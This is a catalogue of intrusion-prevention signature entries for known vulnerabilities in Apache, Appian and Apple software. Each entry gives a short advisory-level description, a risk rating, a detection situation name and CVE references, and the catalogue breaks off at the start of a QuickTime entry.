sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Configuration Error

Description:

A vulnerability in Apache Tomcat, versions 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, which allows remote attackers to enumerate through valid usernames via requests to /j_security_check with malformed URL encoding of passwords.

Situation:

HTTP_CRL-Apache-Tomcat-User-Enumeration

References:

CVE-2009-0580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580

BID-35196
http://www.securityfocus.com/bid/35196

OSVDB-55055
http://www.osvdb.org/55055

Apache-Tomcat-WebSocket-Infinite-Loop-DoS

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1872-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Infinite Loop

Description:

A vulnerability in Apache Tomcat, versions 7.0.27 to 7.0.104, 8.5.0 to 8.5.56, and 9.0.0.M1 to 9.0.36, which allows remote attackers to cause a denial of service condition by sending crafted WebSocket requests to the vulnerable server, due to improper validation of extended payload lengths.

Situation:

HTTP_CS-Apache-Tomcat-WebSocket-Infinite-Loop-DoS

References:

CVE-2020-13935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13935

Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Traffic Control

Risk:

Moderate

First detected in:

sgpkg-ips-1832-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Generic

Software:

Apache Software Foundation Traffic Control

Type:

Input Validation

Description:

Improper validation of the id field of the PUT /deliveryservice_request_comments endpoint causes an SQL injection vulnerability in Apache Traffic Control. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection

References:

CVE-2024-45387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45387

Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Traffic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1103-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There has been reported an information disclosure vulnerability in Apache Traffic Server. A remote attacker could exploit this vulnerability by sending a crafted ESI response to the target server.

Situation:

File-Text_Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure

References:

CVE-2018-8040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8040

Apache-Traffic-Server-HTTP-Range-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in Apache Traffic Server detected

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Generic

Software:

Apache Traffic Server

Type:

Input Validation

Description:

A vulnerability in Apache Traffic Server, versions prior to 9.2.2, which allows remote attackers to cause a denial of service condition by sending a crafted requests to the target server, due to the improper validation of HTTP Range headers.

Situation:

HTTP_CSH-Apache-Traffic-Server-HTTP-Range-Denial-Of-Service

References:

CVE-2023-39456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39456

Apache-Unomi-CVE-2020-13942-RCE

About this vulnerability:

A vulnerability in Apache Unomi

Risk:

High

First detected in:

sgpkg-ips-1300-5242

Last changed:

sgpkg-ips-1300-5242

Platform:

Generic

Software:

Apache Unomi

Type:

Input Validation

Description:

There exists a vulnerability in Apache Unomi, versions before 1.5.2, which allows remote attackers to execute arbitrary code via a crafted request, due to the insufficient validation of OGNL and MVEL2.

Situation:

HTTP_CRL-Apache-Unomi-CVE-2020-13942-RCE

References:

CVE-2020-13942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13942

Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Zeppelin.

Risk:

High

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

Apache Zeppelin

Type:

Input Validation

Description:

A vulnerability in Apache Software Foundation Zeppelin prior to 0.8.2 which allows remote attackers to execute arbitrary code on the target server by sending a crafted request, due to improper input validation of the usernames and roles of the note owners.

Situation:

HTTP_CRL-Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting

References:

CVE-2022-46870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46870

Appian-Enterprise-Business-Suite-DoS

About this vulnerability:

An Appian Enterprise Business Suite DoS vulnerability

Risk:

High

First detected in:

sgpkg-ips-798-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Appian

Type:

Malfunction

Description:

A vulnerability in Appian Enterprise Business Suite, version 5.6 SP1, which allows remote attackers to cause a denial of service via a crafted packet to port tcp/5400.

Situation:

Generic_CS-Appian-Enterprise-Business-Suite-DoS

References:

CVE-2007-6509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6509

OSVDB-39500
http://www.osvdb.org/39500

Apple-CUPS-Cupsd-Privilege-Escalation

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple Common UNIX Printing System

Type:

Malfunction

Description:

An elevation-of-privilege vulnerability has been reported in the Apple CUPS. The vulnerability is due to improper processing of print-job or create-job requests sent to cupsd. A remote, unauthenticated attacker can send a specially crafted localized strings to cause the 'admin/conf' and 'admin' access control lists to fail. Successful exploitation could lead to elevation of privileges on the affected system, giving the attacker the ability to execute arbitrary code with root privileges.

Situation:

HTTP_CS-Apple-CUPS-Cupsd-Privilege-Escalation

References:

CVE-2015-1158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158

Apple-CUPS-Cupsddoselect-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apple Common UNIX Printing System (CUPS)

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Malfunction

Description:

There is a code execution vulnerability in Apple CUPS. The flaw is due to a use-after-free error within cupsdDoSelect function. Remote attackers could exploit this vulnerability by sending a malicious request to the target. Successful exploitation of this vulnerability would allow for arbitrary code execution with root privileges. In case if the attack is not successful, the vulnerable service may terminate abnormally due to memory corruption.

Situation:

HTTP_CS-Apple-CUPS-Cupsddoselect-Remote-Code-Execution

References:

CVE-2009-3553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553

BID-37048
http://www.securityfocus.com/bid/37048

Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Buffer Overflow

Description:

A heap buffer overflow exists in Common Unix Printing System (CUPS). The vulnerability exists in the gif_read_lzw function when handling compressed GIF images. A remote attacker can exploit this vulnerability by sending a specially crafted GIF image to a vulnerable service. Authentication may be required, depending on server configuration. Successful exploitation could result in arbitrary code executions with the privileges of the affected service.

Situation:

File-GIF_Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow

References:

CVE-2011-3170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3170

BID-49323
http://www.securityfocus.com/bid/49323

OSVDB-74673
http://www.osvdb.org/74673

Apple-CUPS-IPP-Use-After-Free-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

OS X

Software:

Common UNIX Printing System

Type:

Malfunction

Description:

A use-after-free memory corruption vulnerability exists in the implementation of Internet Printing Protocol (IPP) of the Common Unix Printing System (CUPS). This vulnerability is caused by improper handling of memory allocations and deallocations for multiple-valued attributes that have their values typed differently. A remote attacker can exploit this vulnerability by specially crafting a request to a CUPS server using the IPP protocol. Successful exploitation can result in execution of arbitrary code in the security context of the CUPS process or daemon, unsuccessful exploitation may result in a denial of service.

Situation:

HTTP_CS-Apple-CUPS-IPP-Use-After-Free-Memory-Corruption

References:

CVE-2010-2941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941

BID-44530
http://www.securityfocus.com/bid/44530

OSVDB-68951
http://www.osvdb.org/68951

Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow

About this vulnerability:

A vulnerability in Apple Common UNIX Printing System

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Integer Overflow

Description:

There exists a buffer overflow vulnerability in Apple's Common Unix Printing System distributed by multiple vendors.

Situation:

HTTP_CS-Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow

References:

BID-32518
http://www.securityfocus.com/bid/32518

Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Common UNIX Printing System (CUPS)

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

openSUSE; SUSE Linux; Ubuntu Linux; Red Hat Linux; Red Hat Enterprise Linux

Software:

Apple Common UNIX Printing System

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Apple's Common Unix Printing System (CUPS) distributed by multiple vendors. The vulnerability is due to a boundary error in handling SGI Image format files. A remote attacker can exploit this vulnerability to compromise a vulnerable system. In an attack case where code injection is not successful, the affected application will terminate abnormally. In a more sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, with the privileges of the printer user, normally lp.

Situation:

HTTP_CS-Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow

References:

CVE-2008-3639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3639

BID-31690
http://www.securityfocus.com/bid/31690

Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

Moderate

First detected in:

sgpkg-ips-588-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Input Validation

Description:

A Cross-Site Scripting vulnerability exists in the Apple CUPS Web Interface. The vulnerability is due to insufficient input validation while handling HTTP requests. A remote attacker can exploit this vulnerability by enticing a user to click on a link containing script code in the URL. Successful exploitation will result in the attacker-controlled script code being executed in the security context of the target user's browser session.

Situation:

HTTP_CSU-Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting

References:

CVE-2014-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856

BID-66788
http://www.securityfocus.com/bid/66788

OSVDB-105715
http://www.osvdb.org/105715

Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159

About this vulnerability:

A vulnerability in Apple Computer Common UNIX Printing System (CUPS)

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple Common UNIX Printing System

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in the Apple CUPS Web Interface. The vulnerability is due to insufficient input validation while handling HTTP requests. A remote attacker can exploit this vulnerability by enticing a user to click on a link containing script code in the URL. Successful exploitation will result in the attacker-controlled script code being executed in the security context of the target user's browser session.

Situation:

HTTP_CSU-Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159

References:

CVE-2015-1159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159

Apple-Finder-Dmg-Volume-Name-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Mac OS X Finder

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Input Validation

Description:

There is a memory corruption vulnerability in the Finder application included in Apple Mac OS X. The flaw is due to improper bounds checking on the length of the Volume name in the DMG disk images. An attacker can exploit this vulnerability by enticing a user to open a crafted DMG disk image. Exploitation of the vulnerability may result in injection and execution of arbitrary code within the security context of the target user.

Situation:

HTTP_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption
File-Binary_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption

References:

CVE-2007-0197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0197

BID-21980
http://www.securityfocus.com/bid/21980

OSVDB-32714
http://www.osvdb.org/32714

Apple-Ichat-Bonjour-Invalid-Pshs-Field-Denial-Of-Service

About this vulnerability:

A vulnerability in Apple iChat Bonjour discovery protocol

Risk:

Low

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Mac OS X

Software:

Apple iChat AV

Type:

Input Validation

Description:

There is a denial of service vulnerability in the Apple iChat instant messaging application. A crafted packed broadcast using the Bonjour discovery protocol can be used to terminate the affected application.

References:

CVE-2007-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0614

BID-22304
http://www.securityfocus.com/bid/22304

OSVDB-32713
http://www.osvdb.org/32713

Apple-iOS-Libtiff-Buffer-Overflow

About this vulnerability:

An Apple iOS Libtiff Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Apple iPhone Firmware

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Apple iPhone Firmware, versions before 3.8.2, in the TIFF library (libtiff) which allows remote attackers to execute arbitrary code.

Situation:

File-Binary_Apple-iOS-Libtiff-Buffer-Overflow

References:

CVE-2006-3459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459

BID-19283
http://www.securityfocus.com/bid/19283

OSVDB-27723
http://www.osvdb.org/27723

Apple-iTunes-M3u-Playlist-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in Apple Computer iTunes

Risk:

High

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple iTunes

Type:

Buffer Overflow

Description:

Multiple buffer overflows have been discovered in Apple iTunes. The vulnerabilities are located in the code responsible for handling m3u files and can be triggered by overly long records in m3u files. An attacker can exploit this vulnerability by enticing a user to open an m3u file with iTunes or to view a specially crafted web page with an embedded m3u playlist. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

References:

CVE-2012-0677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0677

OSVDB-82897
http://www.osvdb.org/82897

Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Apple iTunes

Risk:

High

First detected in:

sgpkg-ips-296-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple iTunes

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple iTunes. The error is due to improper bounds checking when copying user supplied data into a buffer. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted playlist (.pls) file. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
File-TextId_Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow

References:

CVE-2009-2817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2817

BID-36478
http://www.securityfocus.com/bid/36478

Apple-iTunes-Playlist-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple iTunes

Risk:

High

First detected in:

sgpkg-ips-354-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple iTunes

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in the Apple iTunes music player. The application does not perform sufficient validation of user supplied parameters in a play list file. This lack of validation allows for a fixed size buffer to be overrun which can result in a denial of service condition arbitrary code execution.

Situation:

HTTP_SS-Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
HTTP_SS-Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow

References:

CVE-2005-0043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0043

BID-12238
http://www.securityfocus.com/bid/12238

OSVDB-12833
http://www.osvdb.org/12833

Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Apple iTunes

Risk:

High

First detected in:

sgpkg-ips-227-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple iTunes

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple iTunes. A remote attacker can exploit this vulnerability by enticing a target user to visit a crafted website. A successful exploit may lead to non-privileged arbitrary code execution.

Situation:

HTTP_SS-Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
File-Text_Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow

References:

CVE-2009-0950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0950

BID-35157
http://www.securityfocus.com/bid/35157

OSVDB-54833
http://www.osvdb.org/54833

Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in Apple Mac OS X

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Buffer Overflow

Description:

There exists an integer overflow vulnerability in Apple Mac OS X ImageIO. The vulnerability is due to a boundary error in the "gifGetBandProc" function in ImageIO when decompressing a specially crafted GIF image file. Successful exploitation of this issue causes a denial of service condition and allows remote attackers to execute arbitrary code in the context of the application. In a simple attack case, the affected application (e.g. Safari) will terminate immediately when the malicious page is opened. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the currently logged in user.

Situation:

File-GIF_Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow

References:

CVE-2007-1071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1071

BID-22630
http://www.securityfocus.com/bid/22630

OSVDB-34854
http://www.osvdb.org/34854

Apple-Mac-OS-X-Installer-Package-Filename-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Apple Installer

Risk:

Moderate

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Format String

Description:

There is a format string vulnerability in the Apple Installer application. The flaw is due to improper sanity checks on package filename strings. An attacker can exploit this vulnerability by enticing a user to open a crafted package file to inject and execute arbitrary code on the target host within the security context of the target user, or potentially with System-level privileges.

Situation:

HTTP_CSU-Apple-Installer-Package-Filename-Format-String-Vulnerability

References:

CVE-2007-0465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0465

BID-22272
http://www.securityfocus.com/bid/22272

OSVDB-32705
http://www.osvdb.org/32705

Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure

About this vulnerability:

.DS_Store attribute file requested

Risk:

Low

First detected in:

sgpkg-ips-532-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP server

Type:

Configuration Error

Description:

.DS_Store is a metadata file generated by OS X Finder. When present and available, the contents of this file may reveal information on the directory structure of the target system.

Situation:

HTTP_CSU-Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure

References:

BID-3324
http://www.securityfocus.com/bid/3324

OSVDB-6694
http://www.osvdb.org/6694

Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176

About this vulnerability:

A vulnerability in Apple Computer macOS Sonoma

Risk:

Moderate

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Mac OS X

Software:

<os>

Type:

Input Validation

Description:

Improper processing of JP2 files causes a buffer overflow vulnerability in MacOS. A successful exploitation allows an attacker to execute code on the target system.

Situation:

File-JPEG_Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176

References:

CVE-2024-44176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44176

Apple-MacOS-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777

About this vulnerability:

A vulnerability in Apple Computer macOS Sonoma

Risk:

Moderate

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Mac OS X

Software:

<os>

Type:

Input Validation

Description:

Improper processing of PSD files causes a buffer overflow vulnerability in Apple Mac OS X. A successful exploitation allows an attacker to execute code on the target system.

Situation:

File-Binary_Apple-Mac OS X-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777

References:

CVE-2024-40777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-40777

Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783

About this vulnerability:

Apple OS X SceneKit Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

OS X

Software:

Apple SceneKit

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Apple OS X SceneKit.

Situation:

File-TextId_Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783

References:

CVE-2015-3783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3783

BID-76340
http://www.securityfocus.com/bid/76340

Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass

About this vulnerability:

A vulnerability in Apple Computer Apple TV

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Malfunction

Description:

There exists a security feature bypass vulnerability in Apple products.

Situation:

HTTPS_SS-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Generic_TCP-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass

References:

CVE-2014-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266

OSVDB-103583
http://www.osvdb.org/103583

Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Apple QuickTime. The flaw is due to boundary errors in the QuickTime Virtual Reality (QTVR) when processing QTVR movie files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted QTVR movie file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. In an attack case where code injection is not successful, if the affected Apple QuickTime process will terminate abnormally.

Situation:

File-MPEG_Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow

References:

CVE-2007-4675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4675

BID-26342
http://www.securityfocus.com/bid/26342

OSVDB-38545
http://www.osvdb.org/38545

Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Apple Mac OS X

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the QuickDraw system component of Apple Mac OS X. A malicious PICT file may be used to corrupt memory. This may lead to code execution or denial of service.

Situation:

HTTP_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
File-Binary_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption

References:

CVE-2007-0462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0462

BID-22207
http://www.securityfocus.com/bid/22207

OSVDB-32696
http://www.osvdb.org/32696

Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free

About this vulnerability:

A vulnerability in Apple Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-498-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a use-after-free vulnerability in Apple QuickTime's ActiveX control. The vulnerability is due to an error while handling the Clear() method. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to view a maliciously crafted web page. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-Text_Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free

References:

CVE-2012-3754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3754

BID-56438
http://www.securityfocus.com/bid/56438

OSVDB-87089
http://www.osvdb.org/87089

Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient validation of alis volume names in dref and rdrf atoms. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious QuickTime file. This can lead to code execution in the context of the affected application.

Situation:

File-MPEG_Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow

References:

CVE-2013-1017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1017

BID-60097
http://www.securityfocus.com/bid/60097

OSVDB-93625
http://www.osvdb.org/93625

Apple-QuickTime-And-iTunes-Heap-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer, Inc QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime; Apple iTunes

Type:

Buffer Overflow

Description:

A heap memory corruption vulnerability exists in Apple QuickTime and iTunes. The flaw may be exploited by delivering a crafted Apple QuickTime movie file to a target user and enticing the user to open it using the vulnerable product. The exploitation of this vulnerability may allow an attacker to inject and execute arbitrary code on the target host within the security context of the current user.

Situation:

HTTP_SS-Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
File-MPEG_Apple-QuickTime-And-iTunes-Heap-Memory-Corruption

References:

CVE-2005-4092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092

BID-15732
http://www.securityfocus.com/bid/15732

Apple-QuickTime-BMP-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability with BMP image handling in Apple QuickTime products

Risk:

High

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

Apple QuickTime has a buffer overflow vulnerability in the handling of BMP images. An attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_Apple-QuickTime-BMP-Handling-Buffer-Overflow
E-Mail_BS-Apple-QuickTime-BMP-Handling-Buffer-Overflow
File-Binary_Apple-QuickTime-BMP-Handling-Buffer-Overflow

References:

CVE-2006-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2238

BID-17953
http://www.securityfocus.com/bid/17953

OSVDB-24820
http://www.osvdb.org/24820

Apple-QuickTime-Color-Table-Id-Heap-Corruption

About this vulnerability:

A heap corruption vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a heap memory corruption vulnerability in the Apple QuickTime product. The flaw is caused by insufficient checks when processing QTIF files. A remote attacker may exploit this vulnerability by enticing a target user to open a crafted QTIF file, thereby injecting and executing arbitrary code with the privileges of the currently logged-in user.

Situation:

HTTP_Apple-QuickTime-Color-Table-Id-Heap-Corruption
File-MPEG_Apple-QuickTime-Color-Table-Id-Heap-Corruption

References:

CVE-2007-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0718

BID-22827
http://www.securityfocus.com/bid/22827

Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple QuickTime. The flaw is due to improper boundary protection when handling HTTP error responses. A remote attacker can exploit this vulnerability by persuading the target user to visit a malicious server. Successful exploitation could allow for arbitrary code injection and execution with the privileges of the currently logged-on user.

Situation:

HTTP_SLS-Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow

References:

CVE-2008-0234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0234

BID-27225
http://www.securityfocus.com/bid/27225

Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

